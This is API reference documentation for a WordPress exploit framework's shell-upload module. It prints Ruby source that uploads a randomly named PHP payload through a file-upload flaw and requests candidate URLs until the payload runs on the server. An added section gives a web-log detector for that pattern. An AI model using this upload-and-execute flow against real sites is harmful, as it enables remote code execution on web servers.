Module: Wpxf::WordPress::ShellUpload

Includes:
Wpxf
Defined in:
lib/wpxf/wordpress/shell_upload.rb

Overview

Provides reusable functionality for shell upload modules.

Instance Method Details

#before_upload ⇒ Boolean

Called prior to preparing and uploading the payload.

Returns:

  • (Boolean)

    true if no errors occurred.



# File 'lib/wpxf/wordpress/shell_upload.rb', line 67

def before_upload
  true
end

#execute_payload(payload_url) ⇒ HttpResponse

Execute the payload at the specified address.

Parameters:

  • payload_url (String)

    the payload URL to access.

Returns:

  • (HttpResponse)

    the HTTP response of the request to the payload URL.



# File 'lib/wpxf/wordpress/shell_upload.rb', line 116

def execute_payload(payload_url)
  res = execute_get_request(url: payload_url, cookie: @session_cookie)
  emit_success "Result: #{res.body}" if res && res.code == 200 && !res.body.strip.empty?
  res
end

#expected_upload_response_code ⇒ Integer

Returns the response code to expect from a successful upload operation.

Returns:

  • (Integer)

    the response code to expect from a successful upload operation.



# File 'lib/wpxf/wordpress/shell_upload.rb', line 72

def expected_upload_response_code
  200
end

#initialize ⇒ Object

Initializes a new instance of Wpxf::WordPress::ShellUpload.



# File 'lib/wpxf/wordpress/shell_upload.rb', line 8

def initialize
  super

  @session_cookie = nil
  @upload_result = nil
  @payload_name = nil

  _update_info_without_validation(
    desc: %(
      This module exploits a file upload vulnerability
      which allows users to upload and execute PHP
      scripts in the context of the web server.
    )
  )

  register_advanced_options([
    IntegerOption.new(
      name: 'payload_name_length',
      desc: 'The number of characters to use when generating the payload name',
      required: true,
      default: rand(5..10),
      min: 1,
      max: 256
    )
  ])
end

#payload_body_builder ⇒ BodyBuilder

Returns the Utility::BodyBuilder used to generate the uploader form.

Returns:



# File 'lib/wpxf/wordpress/shell_upload.rb', line 51

def payload_body_builder
  nil
end

#payload_name ⇒ String

Returns the file name of the payload, including the file extension.

Returns:

  • (String)

    the file name of the payload, including the file extension.



# File 'lib/wpxf/wordpress/shell_upload.rb', line 41

def payload_name
  @payload_name
end

#payload_name_extension ⇒ String

Returns the extension type to use when generating the payload name.

Returns:

  • (String)

    the extension type to use when generating the payload name.



# File 'lib/wpxf/wordpress/shell_upload.rb', line 82

def payload_name_extension
  'php'
end

#possible_payload_upload_locations ⇒ Array

Returns an array of possible locations that the payload could have been uploaded to.

Returns:

  • (Array)

    an array of possible locations that the payload could have been uploaded to.



# File 'lib/wpxf/wordpress/shell_upload.rb', line 61

def possible_payload_upload_locations
  nil
end

#run ⇒ Boolean

Run the module.

Returns:

  • (Boolean)

    true if successful.



# File 'lib/wpxf/wordpress/shell_upload.rb', line 88

def run
  return false unless super
  return false unless before_upload

  emit_info 'Preparing payload...'
  @payload_name = "#{Utility::Text.rand_alpha(_payload_name_length)}.#{payload_name_extension}"
  builder = payload_body_builder
  return false unless builder

  emit_info 'Uploading payload...'
  return false unless _upload_payload(builder)

  emit_info 'Executing the payload...'
  _validate_and_prepare_upload_locations.each do |payload_url|
    break if execute_payload(payload_url)&.code != 404
  end

  true
end
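A defender can turn the request pattern that `run` produces into a web-log detection: a POST answered with 200, followed by GETs from the same client for a letters-only `.php` name of 5 to 10 characters, with 404s on wrong locations until one request returns something else. The sketch below is an added example, not part of WPXF; the log lines, paths, 30-second window and `known` inventory are constructed assumptions, as is the reading that `rand_alpha` emits letters only.

```ruby
require 'time'

# Constructed sample access-log lines (documentation IPs, made-up paths).
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [12/Mar/2024:10:15:01 +0000] "POST /wp-content/plugins/example-plugin/upload.php HTTP/1.1" 200 31
  203.0.113.7 - - [12/Mar/2024:10:15:02 +0000] "GET /wp-content/uploads/2024/02/qWzKpLr.php HTTP/1.1" 404 162
  203.0.113.7 - - [12/Mar/2024:10:15:02 +0000] "GET /wp-content/uploads/2024/03/qWzKpLr.php HTTP/1.1" 200 48
  198.51.100.4 - - [12/Mar/2024:10:16:40 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 12
  198.51.100.4 - - [12/Mar/2024:10:16:41 +0000] "GET /index.php HTTP/1.1" 200 5120
LOG

LINE = %r{\A(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) }
# Mirrors the defaults above: payload_name_length 5..10, extension 'php'.
# Assumption: the generated name contains letters only.
RANDOM_PHP = %r{/([A-Za-z]{5,10})\.php(?:\?|\z)}

# Returns one finding per non-404 GET of a candidate payload name that
# follows a successful POST from the same client within `window` seconds.
def suspicious_upload_executions(log, window: 30, known: %w[index upload])
  last_post = {}       # client IP => time of the latest POST answered 200
  probes = Hash.new(0) # [client IP, file name] => 404 responses seen so far
  findings = []
  log.each_line do |line|
    next unless (m = LINE.match(line))
    ip, ts, verb, path, status = m.captures
    at = Time.strptime(ts, '%d/%b/%Y:%H:%M:%S %z')
    if verb == 'POST' && status == '200'
      last_post[ip] = at
      next
    end
    name = path[RANDOM_PHP, 1]
    # `known` is the inventory of legitimate PHP base names; it filters
    # out short real files such as index.php that also fit the pattern.
    next unless verb == 'GET' && name && !known.include?(name.downcase)
    next unless last_post[ip] && at - last_post[ip] <= window
    if status == '404'
      probes[[ip, name]] += 1
    else
      findings << { client: ip, path: path, status: status.to_i, probes_404: probes[[ip, name]] }
    end
  end
  findings
end
```

Modules that override `payload_name_extension`, `expected_upload_response_code` or the `payload_name_length` option fall outside these defaults, so the pattern and status check need widening for them.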

#timestamp_range_adjustment_value ⇒ Integer

Returns the number of seconds to adjust the upload timestamp range start and end values by.

Returns:

  • (Integer)

    the number of seconds to adjust the upload timestamp range start and end values by.



# File 'lib/wpxf/wordpress/shell_upload.rb', line 123

def timestamp_range_adjustment_value
  10
end

#upload_request_params ⇒ Hash

Returns the query string parameters to use when submitting the upload request.

Returns:

  • (Hash)

    the query string parameters to use when submitting the upload request.



# File 'lib/wpxf/wordpress/shell_upload.rb', line 77

def upload_request_params
  nil
end

#upload_result ⇒ HttpResponse?

Returns the Net::HttpResponse of the upload operation.

Returns:



# File 'lib/wpxf/wordpress/shell_upload.rb', line 36

def upload_result
  @upload_result
end

#upload_timestamp_range ⇒ Array

Returns the range of possible timestamps that could have been used when the payload reached the target.

Returns:

  • (Array)

    the range of possible timestamps that could have been used when the payload reached the target.



# File 'lib/wpxf/wordpress/shell_upload.rb', line 128

def upload_timestamp_range
  (@start_timestamp - timestamp_range_adjustment_value)..(@end_timestamp + timestamp_range_adjustment_value)
end

#uploaded_payload_location ⇒ String

Returns the URL of the payload after it is uploaded to the target.

Returns:

  • (String)

    the URL of the payload after it is uploaded to the target.



# File 'lib/wpxf/wordpress/shell_upload.rb', line 56

def uploaded_payload_location
  nil
end

#uploader_url ⇒ String

Returns the URL of the file used to upload the payload.

Returns:

  • (String)

    the URL of the file used to upload the payload.



# File 'lib/wpxf/wordpress/shell_upload.rb', line 46

def uploader_url
  nil
end

#validate_upload_result ⇒ Boolean

Returns true if the result of the upload operation is valid.

Returns:

  • (Boolean)

    true if the result of the upload operation is valid.



# File 'lib/wpxf/wordpress/shell_upload.rb', line 109

def validate_upload_result
  true
end